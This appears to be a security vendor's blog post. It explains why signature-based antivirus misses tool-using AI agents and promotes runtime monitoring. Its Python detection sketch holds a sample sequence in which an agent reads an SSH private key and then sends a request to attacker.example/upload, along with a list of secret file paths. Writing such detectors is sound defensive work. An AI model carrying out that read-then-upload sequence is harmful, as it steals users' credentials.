Architecture · 2026-02-14

Why Antivirus Doesn't Stop Tool-Using Agents

Traditional antivirus software is built for a specific threat model: known malware signatures, suspicious executables, and file-based threats. It works well for what it was designed to do.

But AI agents present a fundamentally different challenge.

The agent threat model

When an AI agent runs on your machine with tool access, the "malware" isn't a binary — it's a sequence of legitimate tool calls that together create a harmful outcome:

  1. Read your SSH keys (legitimate file read)
  2. Make an outbound HTTP request (legitimate network call)
  3. The combination: credential exfiltration

Each individual action might pass antivirus checks. The risk is in the pattern and context.
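
To make that concrete, here is a minimal sketch of sequence-based detection in Python. The event format, field names, and secret-path markers are illustrative assumptions, not Runtime Guard's actual API; the point is that the signal only exists across the ordered pair of calls, not in either one.

  # Minimal sketch: flag a "read secret, then network egress" sequence.
  # Event shapes and SECRET_MARKERS are invented for this example.
  SECRET_MARKERS = ("/.ssh/", ".aws/credentials", ".env")

  def is_secret_read(event):
      return event["tool"] == "file_read" and any(
          marker in event["path"] for marker in SECRET_MARKERS
      )

  def is_network_egress(event):
      return event["tool"] == "http_request"

  def flags_exfiltration(events):
      """True if a secret read is later followed by outbound traffic."""
      secret_seen = False
      for event in events:
          if is_secret_read(event):
              secret_seen = True
          elif secret_seen and is_network_egress(event):
              return True
      return False

  session = [
      {"tool": "file_read", "path": "/home/user/.ssh/id_ed25519"},
      {"tool": "http_request", "url": "https://attacker.example/upload"},
  ]
  assert flags_exfiltration(session)  # neither event is suspicious alone

A signature scanner inspecting either event in isolation has nothing to match; only the ordering carries the risk.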

What antivirus misses

  • No signature to match: The agent uses your system's own tools (curl, python, file APIs)
  • No executable to scan: The harmful behavior is a sequence of API calls, not a dropped payload
  • No file-based indicator: The threat lives in runtime behavior, not on disk

What runtime security adds

Runtime Guard monitors at the tool-use layer:

  • Every shell command the agent attempts
  • Every file read or write
  • Every outbound network connection

Actions are scored against policies. High-risk patterns (like reading secrets then making outbound requests) are blocked or flagged for approval.
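
As a rough illustration of that scoring step: the rules, weights, and thresholds below are invented for the example (Runtime Guard's actual policy engine is not documented here), but they show how per-action scores plus accumulated session risk can drive an allow / approve / block decision.

  # Invented policy rules and thresholds, for illustration only.
  POLICIES = [
      (lambda a: a["tool"] == "shell" and "curl" in a.get("args", ""), 40),
      (lambda a: a["tool"] == "file_read" and "/.ssh/" in a.get("path", ""), 60),
      (lambda a: a["tool"] == "http_request", 30),
  ]

  def decide(action, session_risk=0):
      """Score one action against all policies, plus prior session risk."""
      score = session_risk + sum(w for rule, w in POLICIES if rule(action))
      if score >= 80:
          return "block"
      if score >= 50:
          return "needs_approval"
      return "allow"

  read_keys = {"tool": "file_read", "path": "/home/user/.ssh/id_rsa"}
  print(decide(read_keys))                   # needs_approval (score 60)
  print(decide(read_keys, session_risk=30))  # block (90): prior egress seen

Note that the same file read gets two different verdicts depending on session history; that context-dependence is exactly what a file-based scanner cannot express.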

This isn't a replacement for antivirus — it's a different layer for a different threat.


See how runtime monitoring works: run a demo scan or view pricing.
